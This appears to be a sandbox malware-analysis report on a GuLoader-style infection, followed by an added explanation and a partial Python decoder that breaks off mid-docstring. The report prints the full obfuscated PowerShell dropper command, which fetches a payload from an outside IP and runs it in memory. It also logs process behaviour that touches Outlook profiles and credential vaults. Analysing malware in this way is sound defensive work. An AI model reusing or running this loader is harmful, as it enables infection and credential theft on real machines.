Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\AtBroker.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: System.Configuration.Install.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Data.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 0000000A.00000002.20243445512.000000006A10D000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: indows\System.Core.pdbRm source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Data.ni.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl@ source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: ore.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Management.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: System.Management.ni.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Numerics.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp

Data Obfuscation

barindex
Source: Yara match File source: 0000000A.00000002.20097370457.000000000AFA5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.20097330358.00000000090A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Gulix)$global:Gardenpartiene = [System.Text.Encoding]::ASCII.GetString($Thoracostracan)$global:Fdevareindustriens=$Gardenpartiene.substring(298872,26118)<#Dhobee Lsningsforsget Sekti
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Perflation $Reintervention $Guldfatning), (Overcredit @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ablastin = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tilsynsvrger)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Drikkelserne, $false).DefineType($caters, $R
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Gulix)$global:Gardenpartiene = [System.Text.Encoding]::ASCII.GetString($Thoracostracan)$global:Fdevareindustriens=$Gardenpartiene.substring(298872,26118)<#Dhobee Lsningsforsget Sekti
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. 
') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. 
') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"
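The command line quoted above is GuLoader's usual string padding: every literal is stored with junk characters at the even positions, and the helper the script calls Sonedkkets strips them at run time with a Substring loop that starts at index 1, steps by 2 and stops before the last character. Innovative then hands each decoded literal to iex ($Complexes decodes to iex), so the script is assembled and executed one statement at a time. The literals that survive intact on this page decode to the download URL (http://87.121.105.163/Licences.ttf), the User-Agent header name, the ">" separator used to split the URL list, and the final $Gardenpartiene.substring(298872,26118) statement that also appears in plain text in the AMSI entries above; the rest of the chain (a System.Net.WebClient download to a file under %appdata%, a Test-Path / Start-Sleep 4 retry loop, Get-Content and FromBase64String on the dropped file) reads the same way. The Python below re-implements the decoder and runs it over a fragment copied from the command line; it is an added example written for this page, not code from the report or from the sample. One caveat when decoding from this page rather than from the original .bat: the HTML rendering collapsed runs of spaces inside several literals (the Mozilla User-Agent value among them), which shifts the character parity and garbles their decoded form, so the fragment only uses literals that contain no consecutive spaces.

```python
import re
from typing import Dict, List

# Added example for this report page: a Python re-implementation of the string
# decoder that the command line above defines as Sonedkkets. It is not code from
# the sample or from the sandbox vendor; the sample's own decoder is the
# PowerShell Substring loop quoted in the report.


def sonedkkets(padded: str) -> str:
    """Undo the padding: keep positions 1, 3, 5, ... but stop before the last char.

    The original loop is
        for ($i = 1; $i -lt $s.Length - 1; $i += 2) { $out += $s.Substring($i, 1) }
    so the final character is dropped even when its index is odd.
    """
    return "".join(padded[i] for i in range(1, len(padded) - 1, 2))


# Call sites look like: Sonedkkets '<padded literal>' (single-quoted PowerShell
# strings; none of the padded literals in this sample contain a quote).
CALL_RE = re.compile(r"Sonedkkets\s+'([^']*)'")
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Sonedkkets\s+'([^']*)'")


def decode_calls(script: str) -> List[str]:
    """Decode every Sonedkkets '...' literal in the script, in source order.

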